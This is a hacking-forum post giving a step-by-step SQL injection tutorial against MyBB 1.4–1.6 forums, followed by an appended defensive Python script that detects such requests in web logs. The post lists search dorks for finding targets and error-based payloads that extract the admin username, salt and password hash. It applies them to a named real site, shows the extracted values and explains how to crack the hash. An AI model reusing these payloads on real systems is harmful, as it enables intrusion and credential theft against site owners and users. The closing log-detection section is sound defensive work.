Hacking Forums

    How to hack MyBB forums. 1.4 - 1.6

    faroque
    Administrator

    Posts : 11
    Join date : 13/12/2011

    Post by faroque on Tue Dec 13, 2011 12:52 pm

    This thread was made for learning purposes only. Any black hat activities
    that involve this method are at your own risk; I'm not responsible for
    your actions.


    First of all, we've got to find a vulnerable site.
    Google this:


    Code:

    inurl:"index.php?tab=" intext:"MyBB"


    Find a site that's vulnerable.
    How to test if the site is vulnerable:

    Code:

    http://Target.com/index.php?tab=8'


    If the site is vulnerable, you should get a MySQL error like this one:



    Now you have a vulnerable MyBB forum. Now it's time to hack it; paste the following code into the browser:

    Code:

    and(select
    1 from(select count(*),concat((select username from mybb_users where
    uid=1),floor(Rand(0)*2))a from information_schema.tables group by
    a)b)-- -


    I found this vulnerable site:
    Code:

    http://download4all.in/index.php?tab=3'


    So this is how it should be in your browser:
    Code:

    http://download4all.in/index.php?tab=3'
    and(select 1 from(select count(*),concat((select username from
    mybb_users where uid=1),floor(Rand(0)*2))a from
    information_schema.tables group by a)b)-- -


    Now you'll see the username, like this:



    Username can be found here



    So the admin username is:

    Code:

    Admin1


    Now we have to get the Salt, so paste the following thing into your browser:

    Code:

    http://download4all.in/index.php?tab=3'
    and(select 1 from(select count(*),concat((select salt from mybb_users
    where uid=1),floor(Rand(0)*2))a from information_schema.tables group by
    a)b)-- -


    Now you'll see this:



    So the salt is:
    Code:

    7JFqQhFk1


    Now we have to get the admin password:

    Code:

    http://download4all.in/index.php?tab=3'
    and(select 1 from(select count(*),concat((select password from
    mybb_users where uid=1),floor(Rand(0)*2))a from
    information_schema.tables group by a)b)-- -


    Now you'll see this:



    The password is encrypted; you can use hashcat to decrypt it.
    MyBB's password hashing method is md5(md5($salt).md5($pass)).


    How to search for vulnerabilities in a certain MyBB forum.
    Code:

    site:http://target.com inurl:"index.php?tab="


    So for example:
    Code:

    site:http://download4all.in inurl:"index.php?tab="


    Hope You Like My Tutorial
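
Seen from the server side, the requests in the post above are easy to pick out of web access logs. The following is an added example, not part of the original post or of MyBB: a Python scan over constructed combined-format log lines (documentation IP addresses; `classify_tab` and `scan` are hypothetical names) that assumes `tab` is meant to carry a plain integer, as in the post's `tab=3`, and flags both non-integer values and the `floor(rand())` / `group by` / `information_schema` pattern.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); IPs are documentation values.
SAMPLE_LOG = """\
192.0.2.10 - - [13/Dec/2011:12:50:01 +0000] "GET /index.php?tab=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [13/Dec/2011:12:51:09 +0000] "GET /index.php?tab=8' HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.44 - - [13/Dec/2011:12:52:30 +0000] "GET /index.php?tab=3'%20and(select%201%20from(select%20count(*),concat((select%20salt%20from%20mybb_users%20where%20uid=1),floor(Rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)b)--%20- HTTP/1.1" 200 930 "-" "Mozilla/5.0"
192.0.2.77 - - [13/Dec/2011:12:53:02 +0000] "GET /showthread.php?tid=12 HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

# Client address and request target from one combined-format line.
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Fragments of the duplicate-key error technique quoted in the post.
SIGNATURES = [
    re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    re.compile(r"information_schema", re.I),
    re.compile(r"\bmybb_users\b", re.I),
    re.compile(r"\bgroup\s+by\b", re.I),
]

def classify_tab(value):
    """Return 'ok', 'non-integer-tab' or 'error-based-sqli' for a decoded tab value."""
    if re.fullmatch(r"\d+", value):
        return "ok"
    hits = sum(1 for sig in SIGNATURES if sig.search(value))
    return "error-based-sqli" if hits >= 2 else "non-integer-tab"

def scan(log_text):
    """Return (client_ip, verdict, truncated_value) for every suspicious tab parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes the value, so %20 and %27 variants are covered too.
        for value in parse_qs(query, keep_blank_values=True).get("tab", []):
            verdict = classify_tab(value)
            if verdict != "ok":
                findings.append((m.group("ip"), verdict, value[:40]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule that drives the detection is also the fix on the application side: a `tab` value that is cast or validated as an integer before it reaches the query cannot carry the quoted payload.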
